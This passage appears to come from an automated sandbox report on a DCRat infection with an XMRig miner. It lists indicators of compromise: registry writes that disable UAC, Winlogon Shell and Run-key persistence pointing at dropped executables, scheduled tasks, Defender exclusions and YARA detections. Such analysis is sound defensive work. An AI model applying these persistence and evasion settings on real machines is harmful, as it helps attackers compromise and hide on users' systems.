\"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\"" reviewNet.exe -
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4056 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3888 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3688 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3404 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3452 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4844 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3984 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4796 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4128 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4304 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3500 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3256 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4036 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4292 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5132 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3472 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5192 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5232 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5252 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5240 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5356 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5348 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5340 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5400 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5168 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5156 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5424 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5616 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5576 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5532 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5496 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5488 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5464 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5680 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5848 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5952 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5984 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6004 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5992 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5944 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5936 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5916 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5836 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5816 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5780 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6132 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5176 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5328 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3952 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3048 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2624 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3120 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 768 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4084 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3308 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3156 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2616 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2728 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5760 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5884 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3680 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6076 4912 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6084 4912 schtasks.exe -
Processes:
reviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\AtomicHunter.exe dcrat behavioral1/memory/2636-76-0x0000000000980000-0x0000000000C32000-memory.dmp dcrat C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe dcrat behavioral1/memory/5552-249-0x0000000000DC0000-0x0000000001072000-memory.dmp dcrat behavioral1/memory/948-262-0x0000000000E10000-0x00000000010C2000-memory.dmp dcrat behavioral1/memory/4648-265-0x00000000003C0000-0x0000000000672000-memory.dmp dcrat behavioral1/memory/4572-270-0x0000000000B40000-0x0000000000DF2000-memory.dmp dcrat -
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/560-435-0x0000000140000000-0x0000000140840000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 5316 powershell.exe 1472 powershell.exe -
Executes dropped EXE 64 IoCs
Processes:
CrackLauncher.exeAtomicHunter.exeCrackLauncher.exeAtomicHunter.exeAtomicHunter.exeCrackLauncher.exeCrackLauncher.exeAtomicHunter.exeCrackLauncher.exeAtomicHunter.exeCrackLauncher.exeCrackLauncher.exeAtomicHunter.exeAtomicHunter.exeCrackLauncher.exeAtomicHunter.exeCrackLauncher.exeCrackLauncher.exeAtomicHunter.exeAtomicHunter.exeAtomicHunter.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeAtomicHunter.exeAtomicHunter.exeAtomicHunter.exeAtomicHunter.exeAtomicHunter.exeAtomicHunter.exeAtomicHunter.exeAtomicHunter.exeCrackLauncher.exeCrackLauncher.exeAtomicHunter.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exeCrackLauncher.exeAtomicHunter.exereviewNet.exereviewNet.exeCrackLauncher.exeAtomicHunter.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exeAtomicHunter.exeCrackLauncher.exeCrackLauncher.exeAtomicHunter.exeCrackLauncher.exeAtomicHunter.exeAtomicHunter.exeCrackLauncher.exeCrackLauncher.exeAtomicHunter.exepid process 2204 CrackLauncher.exe 2148 AtomicHunter.exe 2756 CrackLauncher.exe 2944 AtomicHunter.exe 2692 AtomicHunter.exe 2932 CrackLauncher.exe 2580 CrackLauncher.exe 2724 AtomicHunter.exe 3012 CrackLauncher.exe 2396 AtomicHunter.exe 2904 CrackLauncher.exe 1516 CrackLauncher.exe 2520 AtomicHunter.exe 1492 AtomicHunter.exe 2860 CrackLauncher.exe 2872 AtomicHunter.exe 2004 CrackLauncher.exe 2272 CrackLauncher.exe 2312 AtomicHunter.exe 1856 AtomicHunter.exe 2024 AtomicHunter.exe 1920 CrackLauncher.exe 324 CrackLauncher.exe 1504 CrackLauncher.exe 2080 CrackLauncher.exe 316 CrackLauncher.exe 2284 CrackLauncher.exe 1372 CrackLauncher.exe 2416 CrackLauncher.exe 1348 AtomicHunter.exe 1812 AtomicHunter.exe 1508 AtomicHunter.exe 1696 AtomicHunter.exe 1804 AtomicHunter.exe 2224 AtomicHunter.exe 1960 AtomicHunter.exe 2484 AtomicHunter.exe 1464 CrackLauncher.exe 552 CrackLauncher.exe 2068 AtomicHunter.exe 1040 reviewNet.exe 1600 reviewNet.exe 1560 reviewNet.exe 2248 reviewNet.exe 2792 CrackLauncher.exe 1028 AtomicHunter.exe 1960 reviewNet.exe 2636 reviewNet.exe 1924 CrackLauncher.exe 348 AtomicHunter.exe 1508 reviewNet.exe 2616 reviewNet.exe 2388 reviewNet.exe 660 reviewNet.exe 2152 AtomicHunter.exe 1468 CrackLauncher.exe 408 CrackLauncher.exe 536 AtomicHunter.exe 3228 CrackLauncher.exe 3276 AtomicHunter.exe 3236 AtomicHunter.exe 3268 CrackLauncher.exe 3384 CrackLauncher.exe 3408 AtomicHunter.exe -
Loads dropped DLL 64 IoCs
Processes:
CrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.execmd.execmd.execmd.execmd.exeCrackLauncher.execmd.execmd.exeCrackLauncher.execmd.execmd.execmd.execmd.exepid process 2848 CrackLauncher.exe 2848 CrackLauncher.exe 2204 CrackLauncher.exe 2204 CrackLauncher.exe 2756 CrackLauncher.exe 2756 CrackLauncher.exe 2932 CrackLauncher.exe 2932 CrackLauncher.exe 2580 CrackLauncher.exe 2580 CrackLauncher.exe 3012 CrackLauncher.exe 2904 CrackLauncher.exe 2904 CrackLauncher.exe 3012 CrackLauncher.exe 1516 CrackLauncher.exe 1516 CrackLauncher.exe 2860 CrackLauncher.exe 2860 CrackLauncher.exe 2004 CrackLauncher.exe 2004 CrackLauncher.exe 2272 CrackLauncher.exe 2272 CrackLauncher.exe 1920 CrackLauncher.exe 1920 CrackLauncher.exe 324 CrackLauncher.exe 324 CrackLauncher.exe 1504 CrackLauncher.exe 1504 CrackLauncher.exe 2080 CrackLauncher.exe 2080 CrackLauncher.exe 316 CrackLauncher.exe 316 CrackLauncher.exe 2284 CrackLauncher.exe 2284 CrackLauncher.exe 1372 CrackLauncher.exe 1372 CrackLauncher.exe 2416 CrackLauncher.exe 2416 CrackLauncher.exe 1464 CrackLauncher.exe 1464 CrackLauncher.exe 2736 cmd.exe 2688 cmd.exe 2612 cmd.exe 2736 cmd.exe 2688 cmd.exe 2612 cmd.exe 1860 cmd.exe 1860 cmd.exe 552 CrackLauncher.exe 552 CrackLauncher.exe 636 cmd.exe 636 cmd.exe 2312 cmd.exe 2312 cmd.exe 2792 CrackLauncher.exe 2792 CrackLauncher.exe 2396 cmd.exe 2396 cmd.exe 1984 cmd.exe 1984 cmd.exe 2292 cmd.exe 2292 cmd.exe 880 cmd.exe 880 cmd.exe -
Adds Run key to start application 2 TTPs 64 IoCs
Processes:
reviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Uninstall Information\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default User\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\ComsurrogateServerdll\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Admin\\Desktop\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\ComsurrogateServerdll\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" reviewNet.exe Set value (str) 